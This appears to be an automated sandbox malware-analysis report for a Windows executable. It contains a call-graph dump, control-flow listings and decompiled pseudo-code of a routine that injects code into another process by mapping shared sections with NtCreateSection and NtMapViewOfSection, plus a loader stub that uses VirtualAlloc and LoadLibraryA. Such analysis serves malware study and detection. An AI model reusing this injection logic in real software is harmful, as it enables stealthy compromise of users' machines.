8508 411bc0 8503->8508 8506 40be64 8517 411ae6 8508->8517 8510 40be56 8510->8506 8511 411997 8510->8511 8512 4119a3 __locking 8511->8512 8513 40eaf4 __lock RtlEncodePointer 8512->8513 8516 4119af 8513->8516 8514 411a18 __locking __fcloseall 8514->8506 8516->8514 8529 416406 8516->8529 8518 411af2 __locking 8517->8518 8519 40eaf4 __lock RtlEncodePointer 8518->8519 8523 411b01 _flsall 8519->8523 8521 411b99 __locking _flsall 8521->8510 8522 411a9e RtlEncodePointer __fflush_nolock 8522->8523 8523->8521 8523->8522 8524 40beb2 8523->8524 8525 40bed5 8524->8525 8526 40bebf 8524->8526 8525->8523 8527 40eaf4 __lock RtlEncodePointer 8526->8527 8528 40bec8 8527->8528 8528->8523 8530 416412 __locking 8529->8530 8534 416426 __locking __fcloseall 8530->8534 8535 40be71 8530->8535 8534->8516 8536 40be83 8535->8536 8537 40be9b 8535->8537 8536->8537 8538 40eaf4 __lock RtlEncodePointer 8536->8538 8539 41638f 8537->8539 8538->8537 8540 4163a3 8539->8540 8541 4163bf 8539->8541 8540->8534 8541->8540 8545 411a36 8541->8545 8543 4163cb __fileno __freebuf 8549 417346 8543->8549 8546 411a4f __fileno 8545->8546 8547 411a71 8545->8547 8546->8547 8553 4124fe 8546->8553 8547->8543 8550 417352 __locking 8549->8550 8551 416660 ___lock_fhandle RtlEncodePointer 8550->8551 8552 41735a __locking __close_nolock __close 8550->8552 8551->8552 8552->8540 8554 41250a __locking 8553->8554 8556 412512 __locking 8554->8556 8557 416660 8554->8557 8556->8547 8558 41666c __locking 8557->8558 8559 40eaf4 __lock RtlEncodePointer 8558->8559 8560 416698 ___lock_fhandle __locking __ioinit 8558->8560 8559->8560 8560->8556 8422 226003c 8423 2260049 8422->8423 8435 2260e0f SetErrorMode SetErrorMode 8423->8435 8428 2260265 8429 22602ce VirtualProtect 8428->8429 8431 226030b 8429->8431 8430 2260439 VirtualFree 8434 22604be LoadLibraryA 8430->8434 8431->8430 8433 22608c7 8434->8433 8436 2260223 8435->8436 8437 2260d90 8436->8437 8438 2260dad 8437->8438 8439 2260238 VirtualAlloc 8438->8439 8440 2260dbb GetPEB 8438->8440 8439->8428 8440->8439 8897 40b75b 8898 40b769 __initterm_e __IsNonwritableInCurrentImage 8897->8898 8900 40b7a6 __IsNonwritableInCurrentImage __initterm 8898->8900 8901 40a71f 8898->8901 8904 40a6e3 8901->8904 8903 40a72c 8903->8900 8905 40a6ef __locking 8904->8905 8910 40b708 8905->8910 8909 40a700 __locking __cinit 8909->8903 8911 40eaf4 __lock RtlEncodePointer 8910->8911 8912 40a6f4 8911->8912 8913 40a5f8 8912->8913 8914 40a60c __decode_pointer 8913->8914 8922 40a69f 8914->8922 8927 4112e9 8914->8927 8916 40a05b __encode_pointer RtlEncodePointer 8918 40a694 8916->8918 8917 40a63a 8919 40a65e 8917->8919 8926 40a686 8917->8926 8931 411249 8917->8931 8920 40a05b __encode_pointer RtlEncodePointer 8918->8920 8919->8922 8923 411249 __realloc_crt RtlEncodePointer 8919->8923 8924 40a674 8919->8924 8920->8922 8922->8909 8923->8924 8924->8922 8925 40a05b __encode_pointer RtlEncodePointer 8924->8925 8925->8926 8926->8916 8929 4112f5 __locking 8927->8929 8928 411305 __locking __msize ___sbh_find_block 8928->8917 8929->8928 8930 40eaf4 __lock RtlEncodePointer 8929->8930 8930->8928 8934 411252 8931->8934 8933 411291 8933->8919 8934->8933 8935 4160f9 8934->8935 8938 416105 7 library calls 8935->8938 8936 40eaf4 __lock RtlEncodePointer 8936->8938 8937 41610c __locking __calloc_impl 8937->8934 8938->8936 8938->8937 8939 40ab5d 8942 40a946 8939->8942 8941 40ab65 8943 40a988 8942->8943 8944 40a950 8942->8944 8943->8941 8944->8943 8945 40a322 __getptd 2 API calls 8944->8945 8946 40a97c 8945->8946 8946->8941 8561 41065e 8562 41067c 8561->8562 8563 41066c 8561->8563 8565 410549 8562->8565 8566 41055e 8565->8566 8567 41056a 8566->8567 8569 4105be __isleadbyte_l 8566->8569 8568 413830 __isctype_l 2 API calls 8567->8568 8570 410582 8567->8570 8568->8570 8571 4132f3 ___crtLCMapStringA 2 API calls 8569->8571 8570->8563 8571->8570 9020 40bda0 9021 40bdad 9020->9021 9022 4111fd __calloc_crt 2 API calls 9021->9022 9023 40bdc7 9022->9023 9024 4111fd __calloc_crt 2 API calls 9023->9024 9025 40bde0 9023->9025 9024->9025 8572 2260005 8577 226092b GetPEB 8572->8577 8574 2260030 8579 226003c 8574->8579 8578 2260972 8577->8578 8578->8574 8580 2260049 8579->8580 8581 2260e0f 2 API calls 8580->8581 8582 2260223 8581->8582 8583 2260d90 GetPEB 8582->8583 8584 2260238 VirtualAlloc 8583->8584 8585 2260265 8584->8585 8586 22602ce VirtualProtect 8585->8586 8588 226030b 8586->8588 8587 2260439 VirtualFree 8591 22604be LoadLibraryA 8587->8591 8588->8587 8590 22608c7 8591->8590 8966 40fbe3 8967 40fbef __locking 8966->8967 8968 40a322 __getptd 2 API calls 8967->8968 8969 40fbf4 8968->8969 8970 40eaf4 __lock RtlEncodePointer 8969->8970 8973 40fc06 8969->8973 8970->8973 8971 40fc14 __locking 8972 40b69c __amsg_exit RtlEncodePointer 8972->8971 8973->8971 8973->8972 8974 4013e3 8975 4013df 8974->8975 8976 401547 NtDuplicateObject 8975->8976 8977 4013b1 8975->8977 8976->8977 8978 401564 NtCreateSection 8976->8978 8979 4015e4 NtCreateSection 8978->8979 8980 40158a NtMapViewOfSection 8978->8980 8979->8977 8982 401610 8979->8982 8980->8979 8981 4015ad NtMapViewOfSection 8980->8981 8981->8979 8984 4015cb 8981->8984 8982->8977 8983 40161a NtMapViewOfSection 8982->8983 8983->8977 8985 401641 NtMapViewOfSection 8983->8985 8984->8979 8985->8977 8350 40c2e5 8357 40b47c 8350->8357 8352 40c2f1 GetStartupInfoA 8358 4111fd 8352->8358 8354 4111fd __calloc_crt 2 API calls 8355 40c312 8354->8355 8355->8354 8356 40c3fa __locking __ioinit 8355->8356 8357->8352 8361 411206 8358->8361 8360 411243 8360->8355 8361->8360 8362 415fdb 8361->8362 8366 415fe7 ___sbh_alloc_block __locking __calloc_impl 8362->8366 8363 416090 RtlAllocateHeap 8363->8366 8365 415fff __locking 8365->8361 8366->8363 8366->8365 8367 40eaf4 8366->8367 8368 40eb09 8367->8368 8369 40eb1b 8367->8369 8373 40ea31 8368->8373 8369->8366 8371 40eb0f 8371->8369 8381 40b69c 8371->8381 8374 40ea3d __locking 8373->8374 8378 40ea59 _doexit __malloc_crt 8374->8378 8386 40bd61 8374->8386 8379 40eaf4 __lock RtlEncodePointer 8378->8379 8380 40ea73 __locking __mtinitlocknum __ioinit 8378->8380 8379->8380 8380->8371 8382 40bd61 __FF_MSGBANNER RtlEncodePointer 8381->8382 8383 40b6a6 8382->8383 8384 40bbb6 __NMSG_WRITE RtlEncodePointer 8383->8384 8385 40b6ae __decode_pointer 8384->8385 8385->8369 8387 40bd68 __set_error_mode 8386->8387 8388 40bbb6 __NMSG_WRITE RtlEncodePointer 8387->8388 8391 40bd97 8387->8391 8389 40bd8d 8388->8389 8390 40bbb6 __NMSG_WRITE RtlEncodePointer 8389->8390 8390->8391 8392 40bbb6 8391->8392 8395 40bbca __set_error_mode _strcat_s __NMSG_WRITE 8392->8395 8393 40bd25 8393->8378 8395->8393 8396 4116ba 8395->8396 8409 40a0cd 8396->8409 8399 411765 __decode_pointer 8399->8393 8402 40a05b __encode_pointer RtlEncodePointer 8403 411723 8402->8403 8404 40a05b __encode_pointer RtlEncodePointer 8403->8404 8405 411738 8404->8405 8406 40a05b __encode_pointer RtlEncodePointer 8405->8406 8407 41174d 8406->8407 8407->8399 8408 40a05b __encode_pointer RtlEncodePointer 8407->8408 8408->8399 8410 40a05b __encode_pointer RtlEncodePointer 8409->8410 8411 40a0d4 8410->8411 8411->8399 8412 40a05b 8411->8412 8413 40a06f __crt_waiting_on_module_handle 8412->8413 8414 40a0c7 8413->8414 8415 40a0bf RtlEncodePointer 8413->8415 8414->8402 8415->8414 8702 40d625 8703 40d62f 8702->8703 8704 40d648 8703->8704 8706 40d5f2 8703->8706 8707 40d5f8 8706->8707 8708 40d603 8707->8708 8710 40c01f 8707->8710 8708->8703 8714 40c02f __flsbuf __getbuf __fileno 8710->8714 8711 40c03a 8711->8708 8712 40c152 8715 4124fe __locking RtlEncodePointer 8712->8715 8713 40c0d2 8716 40c0e9 8713->8716 8718 40c106 8713->8718 8714->8711 8714->8712 8714->8713 8715->8711 8717 4124fe __locking RtlEncodePointer 8716->8717 8717->8711 8718->8711 8720 411cb2 8718->8720 8721 411cbe __locking 8720->8721 8722 416660 ___lock_fhandle RtlEncodePointer 8721->8722 8723 411ccf __locking __lseeki64_nolock __lseeki64 8721->8723 8722->8723 8723->8711 8416 40e426 8417 40e43e _wcslen 8416->8417 8420 40e436 8416->8420 8418 4111fd __calloc_crt 2 API calls 8417->8418 8421 40e462 _wcslen __wsetenvp 8418->8421 8419 4111fd __calloc_crt 2 API calls 8419->8421 8421->8419 8421->8420 8947 40ab66 8948 40a322 __getptd 2 API calls 8947->8948 8949 40ab6e 8948->8949 8950 40a865 ___FrameUnwindToState 2 API calls 8949->8950 8951 40abbe 8950->8951 8952 40abf3 FindHandlerForForeignException 2 API calls 8951->8952 8953 40abdf __locking 8952->8953 8592 2260001 8593 2260005 8592->8593 8594 226092b GetPEB 8593->8594 8595 2260030 8594->8595 8596 226003c 7 API calls 8595->8596 8597 2260038 8596->8597 8762 40a8e7 8765 40a81c 8762->8765 8766 40a82f 8765->8766 8771 40a83b 8765->8771 8768 40a85a 8766->8768 8770 40a322 __getptd 2 API calls 8766->8770 8767 40a322 __getptd 2 API calls 8769 40a84c 8767->8769 8769->8768 8772 40a322 __getptd 2 API calls 8769->8772 8770->8771 8771->8767 8772->8768 8797 402aa7 8800 4029c0 8797->8800 8798 402ab3 8799 401869 15 API calls 8799->8798 8800->8798 8800->8799 8598 40a46b 8600 40a47b __crt_waiting_on_module_handle 8598->8600 8599 40a5db __mtterm 8600->8599 8614 40b956 8600->8614 8603 40a05b __encode_pointer RtlEncodePointer 8604 40a548 8603->8604 8605 40a05b __encode_pointer RtlEncodePointer 8604->8605 8606 40a558 8605->8606 8607 40a05b __encode_pointer RtlEncodePointer 8606->8607 8608 40a568 8607->8608 8609 40a05b __encode_pointer RtlEncodePointer 8608->8609 8610 40a578 __mtinit __decode_pointer 8609->8610 8610->8599 8611 4111fd __calloc_crt 2 API calls 8610->8611 8612 40a5b2 __decode_pointer 8611->8612 8612->8599 8619 40a1c2 8612->8619 8615 40a0cd _raise RtlEncodePointer 8614->8615 8616 40b95e __init_pointers __initp_misc_winsig 8615->8616 8617 40a05b __encode_pointer RtlEncodePointer 8616->8617 8618 40a53d 8617->8618 8618->8603 8620 40a1ce __locking __crt_waiting_on_module_handle 8619->8620 8621 40eaf4 __lock RtlEncodePointer 8620->8621 8622 40a23f __getptd_noexit 8621->8622 8623 40eaf4 __lock RtlEncodePointer 8622->8623 8624 40a260 __locking __getptd_noexit ___addlocaleref 8623->8624 8624->8599 8986 40bfeb 8987 40bff6 8986->8987 8989 40c009 8986->8989 8988 411a36 __flush RtlEncodePointer 8987->8988 8987->8989 8988->8989 8441 40e7ac HeapCreate 8442 40e7d0 8441->8442 8625 40ae71 8626 40ae79 ___BuildCatchObject 8625->8626 8631 40a865 8626->8631 8628 40aeb7 8637 40aacd 8628->8637 8630 40aed8 8632 40a871 __locking 8631->8632 8649 40a322 8632->8649 8635 40a891 __CallSettingFrame@12 8654 40a92b 8635->8654 8636 40a912 __locking 8636->8628 8638 40aad9 __locking 8637->8638 8639 40a322 __getptd 2 API calls 8638->8639 8640 40ab04 8639->8640 8641 40a322 __getptd 2 API calls 8640->8641 8642 40ab12 8641->8642 8643 40a322 __getptd 2 API calls 8642->8643 8644 40ab20 8643->8644 8645 40a322 __getptd 2 API calls 8644->8645 8646 40ab2b 8645->8646 8665 40abf3 8646->8665 8648 40abdf __locking 8648->8630 8659 40a2a9 8649->8659 8652 40a337 8652->8635 8653 40b69c __amsg_exit RtlEncodePointer 8653->8652 8655 40a322 __getptd 2 API calls 8654->8655 8656 40a930 8655->8656 8657 40a322 __getptd 2 API calls 8656->8657 8658 40a93e 8656->8658 8657->8658 8658->8636 8660 40a2b3 ___set_flsgetvalue 8659->8660 8661 40a2fd 8660->8661 8662 4111fd __calloc_crt 2 API calls 8660->8662 8661->8652 8661->8653 8663 40a2d4 __decode_pointer 8662->8663 8663->8661 8664 40a1c2 __getptd_noexit RtlEncodePointer 8663->8664 8664->8661 8666 40ac01 8665->8666 8667 40a322 __getptd 2 API calls 8666->8667 8668 40ac07 8667->8668 8669 40a322 __getptd 2 API calls 8668->8669 8670 40ac15 FindHandler 8669->8670 8670->8648 8776 40a8f1 8777 40a89c __CallSettingFrame@12 8776->8777 8778 40a92b ___FrameUnwindToState 2 API calls 8777->8778 8779 40a912 __locking 8778->8779 8801 40a6b2 8802 4111fd __calloc_crt 2 API calls 8801->8802 8803 40a6be 8802->8803 8804 40a05b __encode_pointer RtlEncodePointer 8803->8804 8805 40a6c6 8804->8805 8806 4014b3 8807 4014c4 8806->8807 8808 401547 NtDuplicateObject 8807->8808 8809 401663 8807->8809 8808->8809 8810 401564 NtCreateSection 8808->8810 8811 4015e4 NtCreateSection 8810->8811 8812 40158a NtMapViewOfSection 8810->8812 8811->8809 8814 401610 8811->8814 8812->8811 8813 4015ad NtMapViewOfSection 8812->8813 8813->8811 8816 4015cb 8813->8816 8814->8809 8815 40161a NtMapViewOfSection 8814->8815 8815->8809 8817 401641 NtMapViewOfSection 8815->8817 8816->8811 8817->8809 8724 40c635 8726 40c68f __input_l 8724->8726 8730 40c6af __input_l __decode_pointer __fileno 8724->8730 8725 40c60b RtlEncodePointer RtlAllocateHeap __whiteout 8725->8730 8727 41051b RtlEncodePointer RtlAllocateHeap __whiteout 8727->8730 8728 41049a RtlEncodePointer RtlAllocateHeap __input_l 8728->8730 8729 410416 RtlEncodePointer RtlAllocateHeap __hextodec 8729->8730 8730->8725 8730->8726 8730->8727 8730->8728 8730->8729 8731 40c5c2 RtlEncodePointer RtlAllocateHeap __hextodec 8730->8731 8732 40c5e2 RtlEncodePointer __whiteout 8730->8732 8733 40c56b RtlEncodePointer RtlAllocateHeap __input_l 8730->8733 8731->8730 8732->8730 8733->8730 8960 40a33c 8962 40a348 __locking 8960->8962 8961 40a406 __locking ___freetlocinfo ___removelocaleref __freefls@4 8962->8961 8963 40eaf4 __lock RtlEncodePointer 8962->8963 8964 40a3cd __freefls@4 8963->8964 8965 40eaf4 __lock RtlEncodePointer 8964->8965 8965->8961

                      Executed Functions

                      Function 004013D8 Relevance: 10.8, APIs: 7, Instructions: 311COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 85 4013d8-4013de 86 4013df-401409 85->86 91 401400-401405 86->91 92 40140c call 40119e 86->92 91->92 94 401411-40142b 92->94 95 401410 94->95 96 40142d-401435 94->96 95->94 97 401437-40143f 96->97 98 4013cc 96->98 102 401441-401447 97->102 103 40145d-40146c 97->103 99 4013b1-4013c5 98->99 100 4013ce-4013d5 98->100 104 401449 102->104 105 40142c 102->105 106 40146d-401472 103->106 107 40149a-4014a5 104->107 108 40144b-401450 104->108 105->86 105->96 109 401474 106->109 110 401457 106->110 111 401452 108->111 112 4014bb-4014cd 108->112 109->106 116 401476-401478 109->116 113 401459-40145b 110->113 114 40143c-40143f 110->114 111->110 120 4014d2-4014d7 112->120 121 4014cf-4014d1 112->121 113->103 114->102 114->103 118 40147a-401482 116->118 119 4014de-4014f1 call 40119e 116->119 124 401484 118->124 125 4014f3 119->125 126 4014f6-4014fb 119->126 120->119 121->120 124->124 125->126 128 401501-401512 126->128 129 401824-40182c 126->129 132 401822 128->132 133 401518-401541 128->133 129->126 134 401831-401842 129->134 132->134 133->132 143 401547-40155e NtDuplicateObject 133->143 137 401845-401866 call 40119e 134->137 138 401838-40183e 134->138 138->137 143->132 145 401564-401588 NtCreateSection 143->145 147 4015e4-40160a NtCreateSection 145->147 148 40158a-4015ab NtMapViewOfSection 145->148 147->132 151 401610-401614 147->151 148->147 150 4015ad-4015c9 NtMapViewOfSection 148->150 150->147 153 4015cb-4015e1 150->153 151->132 152 40161a-40163b NtMapViewOfSection 151->152 152->132 154 401641-40165d NtMapViewOfSection 152->154 153->147 154->132 155 401663 call 401668 154->155
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0770cd10f47575dba946c72a205b39b8d4daa6ec592c66899ecf253aeda9c0e3
                      • Instruction ID: 67db8dc375151bfe257540867c3d287c712409260c0918a2d7cc4bffad82e0fd
                      • Opcode Fuzzy Hash: 0770cd10f47575dba946c72a205b39b8d4daa6ec592c66899ecf253aeda9c0e3
                      • Instruction Fuzzy Hash: 22912472600204ABDB219FA1CC44EEF7BB8EF81B14F10467AFA12BB1F5D6759905CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014A8 Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 158 4014a8-4014c4 162 4014db 158->162 163 4014cc-4014f1 call 40119e 158->163 162->163 167 4014f3 163->167 168 4014f6-4014fb 163->168 167->168 170 401501-401512 168->170 171 401824-40182c 168->171 174 401822 170->174 175 401518-401541 170->175 171->168 176 401831-401842 171->176 174->176 175->174 185 401547-40155e NtDuplicateObject 175->185 179 401845-401866 call 40119e 176->179 180 401838-40183e 176->180 180->179 185->174 187 401564-401588 NtCreateSection 185->187 189 4015e4-40160a NtCreateSection 187->189 190 40158a-4015ab NtMapViewOfSection 187->190 189->174 193 401610-401614 189->193 190->189 192 4015ad-4015c9 NtMapViewOfSection 190->192 192->189 195 4015cb-4015e1 192->195 193->174 194 40161a-40163b NtMapViewOfSection 193->194 194->174 196 401641-40165d NtMapViewOfSection 194->196 195->189 196->174 197 401663 call 401668 196->197
                      C-Code - Quality: 59%
                      			E004014A8(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				long* _t130;
				signed int _t137;
				int _t138;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t160;
				intOrPtr* _t161;
				void* _t164;
				void* _t171;
				long _t172;
				intOrPtr _t173;
				void* _t174;
				long* _t180;
				intOrPtr* _t181;
				HANDLE* _t182;
				HANDLE* _t183;
				void* _t188;
				void* _t189;
				intOrPtr* _t192;
				void* _t193;
				intOrPtr _t196;
				intOrPtr* _t197;
				intOrPtr* _t198;
				void* _t200;
				intOrPtr* _t201;
				void* _t202;
				long _t217;

				_t84 = 0x14e3;
				_push(0x37f);
				_t128 =  *_t197;
				_t198 = _t197 + 4;
				L0040119E(_t84, _t128, _t171, __eflags);
				_t127 = _a4;
				_t172 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t180 =  &_v100;
				 *_t180 = _t172;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t130 =  &_v52;
					 *_t130 = _t90;
					_t130[1] = _t172;
					_t181 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
					 *_t181 = 0x18;
					_push( &_v52);
					_push(_t181);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t172, _t172, 2) == 0) {
						_v12 = _t172;
						_t98 =  &_v84;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t182 =  &_v88;
						if(NtCreateSection(_t182, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t172;
							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t172;
								if(NtMapViewOfSection( *_t182, _v16, _t123, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
									_t196 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t196, 0x104);
									 *((intOrPtr*)(_t196 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t100 =  &_v84;
						 *(_t100 + 4) = _t172;
						 *_t100 = _a12 + 0x10000;
						_t183 =  &_v92;
						if(NtCreateSection(_t183, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t102 =  &_v76;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t102, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
								_t104 =  &_v68;
								 *_t104 = _t172;
								_t217 = NtMapViewOfSection( *_t183, _v16, _t104, _t172, _t172, _t172,  &_v60, 1, _t172, 0x20);
								if(_t217 == 0) {
									L21();
									if(_t217 == 0 && _t217 != 0) {
									}
									_t200 = _t198 + 4;
									_push(0x2e62);
									_t201 = _t200 + 4;
									_push(0x2260);
									_t106 =  *_t201;
									_t202 = _t201 + 4;
									_t157 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t158 = _t157;
									asm("loop 0xffffffc2");
									_t159 = _t158 ^ 0xbcc951dd;
									_t198 = _t202 - _t159;
									_t188 = _a8 +  *_a8;
									_t137 =  *(_t188 + 6) & 0x0000ffff;
									_push(_t188);
									_t160 = _t188;
									if(_v56 == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
										_t198 = _t198 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t222 = _v56;
									if(_v56 == 0) {
										_push(_t189);
										_t164 =  *((intOrPtr*)(_t189 + 0x34)) - _v68;
										_t192 =  *((intOrPtr*)(_t189 + 0xa0)) + _v76;
										__eflags = _t192;
										while(1) {
											__eflags =  *_t192;
											if( *_t192 == 0) {
												break;
											}
											_t173 =  *_t192;
											_t192 = _t192 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t173));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t193);
										_t172 = 0;
										__eflags = 0;
										_t108 =  &_v8;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t193 + 0x28)) + _v68, _v64, _t108, 0);
									} else {
										L54();
										_pop(_t174);
										_t172 = _t174 - 0x1760;
										 *((intOrPtr*)(_t172 + 0x1794)) = _t172 + 0x2c17;
										L00401227(_t127, _t172, _t222, _t172 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t172 + 0x17b9)) = _t172 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t129 =  *_t198;
				return L0040119E(_t91, _t129, _t172, _t222);
			}


































































                      0x004014bc
                      0x004014cc
                      0x004014d1
                      0x004014d4
                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158a
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                      • Instruction ID: cd3d7ef155730ff18c04e90283d35d9337f0c2e1175127a0e4488d23b7b2eda1
                      • Opcode Fuzzy Hash: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                      • Instruction Fuzzy Hash: B6511871900249BBEB219F91CC48FEBBBB9EF85B10F104129FA11BA2E5D7749941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014B3 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
